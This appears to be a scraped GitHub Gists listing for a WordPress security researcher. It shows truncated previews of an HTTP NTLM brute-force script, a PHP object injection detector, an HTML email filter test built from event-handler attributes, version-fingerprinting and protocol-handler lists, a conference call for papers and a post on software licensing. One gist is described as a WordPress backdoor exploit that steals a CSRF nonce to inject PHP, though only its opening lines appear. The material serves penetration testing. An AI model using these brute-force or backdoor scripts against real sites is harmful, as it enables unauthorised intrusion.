Ryan Dewhurst ethicalhack3r
View mad5.txt
Yes, this is a joke. But we will really be releasing a WordPress plugin. Let us know if you find any vulnerabilities ;)
ethicalhack3r / http_ntlm__auth_brute.rb
Created Aug 17, 2018
Brute Forces HTTP NTLM Basic Authentication using Typhoeus
#!/usr/bin/env ruby
require 'typhoeus'
target_url = ARGV[0]
usernames =[1]).split("\n")
passwords =[2]).split("\n")
hydra =
ethicalhack3r / wp_php_object_injection.rb
Last active Jun 11, 2018
Burp Suite Extension to detect PHP Object Injection in WordPress Plugins (read the code comments for additional info)
java_import 'burp.IBurpExtender'
java_import 'burp.IScannerCheck'
java_import 'burp.IScanIssue'
require 'java'
java_import 'java.util.Arrays'
java_import 'java.util.ArrayList'
# You will need to download JRuby's Complete.jar file from and configure Burp Extender with its path.
ethicalhack3r / html_test.html
Created Mar 6, 2017 — forked from rwestergren/html_test.html
HTML Email Filter Test
<a onafterprint="console.log(244599)" onbeforeprint="console.log(309354)" onbeforeunload="console.log(879813)" onerror="console.log(949564)" onhashchange="console.log(575242)" onload="console.log(301053)" onmessage="console.log(976974)" onoffline="console.log(796090)" ononline="console.log(432638)" onpagehide="console.log(504345)" onpageshow="console.log(696619)" onpopstate="console.log(398418)" onresize="console.log(943097)" onstorage="console.log(882233)" onunload="console.log(929443)" onblur="console.log(932104)" onchange="console.log(102339)" oncontextmenu="console.log(761265)" onfocus="console.log(188946)" oninput="console.log(143653)" oninvalid="console.log(304208)" onreset="console.log(318472)" onsearch="console.log(778420)" onselect="console.log(942035)" onsubmit="console.log(603589)" onkeydown="console.log(650647)" onkeypress="console.log(579383)" onkeyup="console.log(821763)" onclick="console.log(284098)" ondblclick="console.log(477370)" ondrag="console.log(439095)" ondragend="console.log(546684)" o
ethicalhack3r / magento_version.rb
Created Dec 12, 2016
Finds the remote version of magento
#!/usr/bin/env ruby
require 'typhoeus'
require 'json'
require 'uri'
require 'digest/md5'
target = ARGV[0]
ethicalhack3r / events.txt
Last active Oct 5, 2016
List of event attributes
ethicalhack3r /
Created Feb 29, 2016
[CFP] EuskalHack (San Sebastian / Donostia) 2016


EuskalHack Security Congress is the first Ethical Hacking association in Euskadi, with the aim of promoting the community and culture in digital security to anyone who may be interested.

This exclusive conference is shaping up to be the most relevant in the Basque Country, with an estimated 125 attendees for the first edition.

The participants include specialised companies, state security organisations, professionals, hobbyists and students in the area of security and Information Technology.

Estimated date and location

ethicalhack3r / chrome-uri.txt
Last active Apr 11, 2018
Chrome 'protocol handlers' extracted from Google Chrome browser source code (chromium-50.0.2624.0.tar.xz downloaded from A lot will not work, some are probably from unit tests.
ethicalhack3r / backdoor.js
Last active Oct 13, 2017
wp backdoor exploit (injects a PHP backdoor)
var wpnonce = '';
function getCSRFNonce(callback)
var re = /<input type="hidden" id="_wpnonce" name="_wpnonce" value="(\w*)" \/>/
var xhr = new XMLHttpRequest();"GET", "", true);
xhr.withCredentials = true;
View post.txt
When you first release software online you don't put too much thought into the software license (I didn't at least). You have no idea if the project will take off. If your intention is for your peers to use it freely your first thought may be Open Source. The most popular Open Source license is the GNU GPL, so why not use that!?
I released WPScan on the 16th of June 2011 along with the GNU GPL license. After a while I built up a team, The WPScan Team, which were people who had the same goals as me, to make an awesome black box WordPress scanning tool. The WPScan Team (3 other awesome people) and I have been working on WPScan in our spare time as volunteers for almost 4 years. Countless hours, days, weeks and months of man hours have been put into WPScan and recently the WPScan Vulnerability Database by us.
And we don't mind this, we do it because we want our peers to be able to use the software freely. We do it because we want to use the software ourselves. Of course there is no selfless deed, we do it for